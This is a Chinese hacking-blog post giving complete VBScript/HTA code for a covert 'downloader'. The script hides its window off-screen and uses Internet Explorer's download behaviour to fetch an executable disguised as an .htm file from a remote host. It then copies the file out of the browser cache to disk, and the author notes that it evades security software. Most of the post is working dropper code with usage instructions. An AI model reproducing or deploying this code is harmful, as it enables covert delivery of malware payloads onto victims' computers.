一、先说本blog上有两个比较新颖的vbs下载者,一个是利用CDO.Message组件做的,另一个是用Microsoft.XMLDOM做的,参见
https://www.cnhackhy.com/article/15506.htm。这两个下载者一个是利用起来比较麻烦,需要事先把exe进行转化。第二使用中cscript.exe会访问网络,不太隐蔽。第二个是有的机器上并不存在这两个组件及利用到ADODB.Stream的,所以有些弊端。
二、再来说一下lake2的下载者http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx。这个下载者算是不错了,但是也有问题。一个是如果装了360等其它的浏览器的话,会打开一个ie窗口,并且从注册表中读到的ie缓存位置不一定准确。
三、那我们如何来更新这些缺陷?还是有办法的。我们用hta来写,这个就比较少见了.hh.exe访问网络一般估计会放行的。写这个下载者要解决的困难有几下几点:
(1).使hta不可见-------------》简单,移动窗口
(2).使hta接收命令行参数--------------》本blog上有资料
(3).不调用上边一、二大项所说的所有组件-----------》这个我们利用ie的默认行为
(4).ie缓存的临时位置---------》我用的环境变量
(5)我们不调用任何组件-------------------》需要手动
四、代码(直接把参数写在hta里)
复制代码 代码如下:
<script language=vbs>
window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
set objshell= Createobject("WScript.Shell")'hta是可以直接调用WScript.Shell的,不过不能调用wscript.Createobject("WScript.Shell")
downpath=objshell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings" '根据环境变量得到下载的路径
set xml=document.createElement("xml")'建方xml元素调用ie的默认行为
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load("http://192.168.0.10/xx.htm")'请把exe改名放到空间上,用ftp软件上传的话,可能不行,直接放比较好
ShowAllFile(downpath)
Sub ShowAllFile(Path) '遍历查找,直接用lake2的代码
FindFileName="xx[1].htm" '这个也是你需要改的,如果上边是xx.htm,这里就是xx[1].htm
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 in fc
If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, "c:\111.exe" '保存到c:\111.exe,可根据需要改动
'document.write "[+]Download Success !"
End If
ShowAllFile path&"\"&f1.name
Next
Set FSO = Nothing
End Sub
window.close
</script>
用法是:把exe好比xx.exe改名放到空间上,然后命令行下或双击这个hta就可以了。
五、另一份代码(传命令行参数)
我个人觉得第四部份的代码比较好,修改一下用就可以了。如果调用命令行参数的话,我发现还是会出现hta小窗口,下载完后才关闭,所以这不太好。代码:
复制代码 代码如下:
<HTA:APPLICATION
ID="MySampleHTA"
Caption="yes">
<script language=vbs>
on error resume Next
window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
cmdLineArray = Split(MySampleHTA.commandLine)'这是把命令中的参数变成数组
set objshell= Createobject("WScript.Shell")
downpath=objshell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings" '根据环境变量得到下载的路径
temp=LastOne(cmdLineArray(UBound(cmdLineArray)),"/") '从命令行得到当前文件名
temp=split(temp,".")'根据.分割
FindFileName=temp(0)&"[1]."&temp(1)
LocalName=objshell.CurrentDirectory&"\"&temp(0)&".exe"
set xml=document.createElement("xml")
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load(cmdLineArray(UBound(cmdLineArray)))
ShowAllFile(downpath)
Sub ShowAllFile(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 in fc
If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, LocalName
'document.write "[+]Download Success !"
End If
ShowAllFile path&"\"&f1.name
Next
Set FSO = Nothing
End Sub
Function LastOne(Str,splitStr)
'输入字符和分隔符,得到最后一部分
LastOne = right(Str,len(Str)-InStrRev(Str,splitStr))
End Function
window.close
</script>
用法是:把exe好比xx.exe改名xx.htm放到空间上,然后命令行下好比"c:\xx.hta http://www.target.com/xx.htm",这样xx.exe就会保存到c:
六、不调用任何组件(需手动查找下载的xx[1].htm):
复制代码 代码如下:
window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
set xml=document.createElement("xml")'建方xml元素调用ie的默认行为
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load("http://192.168.0.10/xx.htm")'
window.close
七、缺点
我这个hta下载者并不是完美的。第一是因为下载到的临时变量我用到了ExpandEnvironmentStrings("%USERPROFILE%"),这样在用户环境下可用,如果是system权限下可能不正常(我猜测的,并没有测试)。第二是因为下载成功后并没有提示,直接用hta在命令行下显示出回显有些麻烦,所以我没有做,嘿嘿。
本文由 华域联盟 原创撰写:华域联盟 » 做一个困难重重的hta下载者
转载请保留出处和原文链接:https://www.cnhackhy.com/13936.htm
